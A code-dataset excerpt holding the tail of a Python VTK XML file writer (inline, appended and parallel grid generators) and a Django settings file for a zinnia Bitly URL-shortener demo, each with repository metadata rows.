elif compressor is None:
pass
else:
raise ValueError("Invalid compressor name `%s'" % compressor)
self.compressor = compressor
def __call__(self, vtkobj):
child = self.rec(vtkobj)
vtkf = make_vtkfile(child.tag, self.compressor)
vtkf.add_child(child)
return XMLRoot(vtkf)
def rec(self, vtkobj):
return vtkobj.invoke_visitor(self)
class InlineXMLGenerator(XMLGenerator):
def gen_unstructured_grid(self, ugrid):
el = XMLElement("UnstructuredGrid")
piece = XMLElement("Piece",
NumberOfPoints=ugrid.point_count, NumberOfCells=ugrid.cell_count)
el.add_child(piece)
if ugrid.pointdata:
data_el = XMLElement("PointData")
piece.add_child(data_el)
for data_array in ugrid.pointdata:
data_el.add_child(self.rec(data_array))
if ugrid.celldata:
data_el = XMLElement("CellData")
piece.add_child(data_el)
for data_array in ugrid.celldata:
data_el.add_child(self.rec(data_array))
points = XMLElement("Points")
piece.add_child(points)
points.add_child(self.rec(ugrid.points))
cells = XMLElement("Cells")
piece.add_child(cells)
cells.add_child(self.rec(ugrid.cell_connectivity))
cells.add_child(self.rec(ugrid.cell_offsets))
cells.add_child(self.rec(ugrid.cell_types))
return el
def gen_structured_grid(self, sgrid):
extent = []
for dim in range(3):
extent.append(0)
if dim < len(sgrid.shape):
extent.append(sgrid.shape[dim]-1)
else:
extent.append(1)
extent_str = " ".join(str(i) for i in extent)
el = XMLElement("StructuredGrid", WholeExtent=extent_str)
piece = XMLElement("Piece", Extent=extent_str)
el.add_child(piece)
if sgrid.pointdata:
data_el = XMLElement("PointData")
piece.add_child(data_el)
for data_array in sgrid.pointdata:
data_el.add_child(self.rec(data_array))
if sgrid.celldata:
data_el = XMLElement("CellData")
piece.add_child(data_el)
for data_array in sgrid.celldata:
data_el.add_child(self.rec(data_array))
points = XMLElement("Points")
piece.add_child(points)
points.add_child(self.rec(sgrid.points))
return el
def gen_data_array(self, data):
el = XMLElement("DataArray", type=data.type, Name=data.name,
NumberOfComponents=data.components, format="binary")
data.encode(self.compressor, el)
el.add_child("\n")
return el
class AppendedDataXMLGenerator(InlineXMLGenerator):
def __init__(self, compressor=None):
InlineXMLGenerator.__init__(self, compressor)
self.base64_len = 0
self.app_data = XMLElement("AppendedData", encoding="base64")
self.app_data.add_child("_")
def __call__(self, vtkobj):
xmlroot = XMLGenerator.__call__(self, vtkobj)
self.app_data.add_child("\n")
xmlroot.children[0].add_child(self.app_data)
return xmlroot
def gen_data_array(self, data):
el = XMLElement("DataArray", type=data.type, Name=data.name,
NumberOfComponents=data.components, format="appended",
offset=self.base64_len)
self.base64_len += data.encode(self.compressor, self.app_data)
return el
class ParallelXMLGenerator(XMLGenerator):
def __init__(self, pathnames):
XMLGenerator.__init__(self, compressor=None)
self.pathnames = pathnames
def gen_unstructured_grid(self, ugrid):
el = XMLElement("PUnstructuredGrid")
pointdata = XMLElement("PPointData")
el.add_child(pointdata)
for data_array in ugrid.pointdata:
pointdata.add_child(self.rec(data_array))
points = XMLElement("PPoints")
el.add_child(points)
points.add_child(self.rec(ugrid.points))
cells = XMLElement("PCells")
el.add_child(cells)
cells.add_child(self.rec(ugrid.cell_connectivity))
cells.add_child(self.rec(ugrid.cell_offsets))
cells.add_child(self.rec(ugrid.cell_types))
for pn in self.pathnames:
el.add_child(XMLElement("Piece", Source=pn))
return el
def gen_data_array(self, data):
el = XMLElement("PDataArray", type=data.type, Name=data.name,
NumberOfComponents=data.components)
return el
def write_structured_grid(file_name, mesh, cell_data=[], point_data=[]):
grid = StructuredGrid(mesh)
from pytools.obj_array import with_object_array_or_scalar
def do_reshape(fld):
return fld.T.copy().reshape(-1)
for name, field in cell_data:
reshaped_fld = with_object_array_or_scalar(do_reshape, field,
obj_array_only=True)
grid.add_pointdata(DataArray(name, reshaped_fld))
for name, field in point_data:
reshaped_fld = with_object_array_or_scalar(do_reshape, field,
obj_array_only=True)
grid.add_pointdata(DataArray(name, reshaped_fld))
from os.path import exists
if exists(file_name):
raise RuntimeError("output file '%s' already exists"
% file_name)
outf = open(file_name, "w")
AppendedDataXMLGenerator()(grid).write(outf)
outf.close()
| [
"inform@tiker.net"
] | inform@tiker.net |
097955982d9a4cd85cd972d01f493310df17eb98 | 43206144544e89d1510f8f77c443735200222f27 | /demo_zinnia_bitly/settings.py | 721a88ca90133e533008ec7ec45dec0e08e651fe | [
"BSD-3-Clause"
] | permissive | SteveByerly/zinnia-url-shortener-bitly | e655aa4bb4b560a67a28c84c2ddf9126d4904f7b | 67bf0681e3d16bf27c05cc0a91229cdc1ad3fb8e | refs/heads/develop | 2021-01-21T08:38:20.303625 | 2015-04-20T23:23:46 | 2015-04-20T23:23:46 | 34,291,673 | 0 | 0 | null | 2015-04-20T23:13:25 | 2015-04-20T23:13:25 | null | UTF-8 | Python | false | false | 2,440 | py | """Settings for the zinnia-bitly demo"""
import os
gettext = lambda s: s
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DATABASES = {'default':
{'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(os.path.dirname(__file__), 'demo.db')}
}
TIME_ZONE = 'Europe/Paris'
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
SECRET_KEY = 'jo-1rzm(%sf)3#n+fa7j945yuv3(pt63abhi12_t7e^^5q8dyw'
USE_TZ = True
USE_I18N = True
USE_L10N = True
SITE_ID = 1
LANGUAGE_CODE = 'en'
LANGUAGES = (
('en', gettext('English')),
('fr', gettext('French')),
('de', gettext('German')),
('es', gettext('Spanish')),
('it', gettext('Italian')),
('nl', gettext('Dutch')),
('sl', gettext('Slovenian')),
('bg', gettext('Bulgarian')),
('hu', gettext('Hungarian')),
('cs', gettext('Czech')),
('sk', gettext('Slovak')),
('lt', gettext('Lithuanian')),
('ru', gettext('Russian')),
('pl', gettext('Polish')),
('eu', gettext('Basque')),
('he', gettext('Hebrew')),
('ca', gettext('Catalan')),
('tr', gettext('Turkish')),
('sv', gettext('Swedish')),
('hr_HR', gettext('Croatian')),
('pt_BR', gettext('Brazilian Portuguese')),
('fi_FI', gettext('Finnish (Finland)')),
('zh_CN', gettext('Simplified Chinese')),
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'demo_zinnia_bitly.urls'
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.i18n',
'django.core.context_processors.request',
'django.contrib.messages.context_processors.messages',
'zinnia.context_processors.version',
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.sitemaps',
'django.contrib.comments',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.sites',
'django.contrib.admin',
'django.contrib.staticfiles',
'mptt',
'zinnia',
'tagging',
'django_bitly',
)
ZINNIA_URL_SHORTENER_BACKEND = 'zinnia_bitly'
BITLY_LOGIN = 'YOUR_LOGIN'
BITLY_API_KEY = 'YOUR_API_KEY'
| [
"fantomas42@gmail.com"
] | fantomas42@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.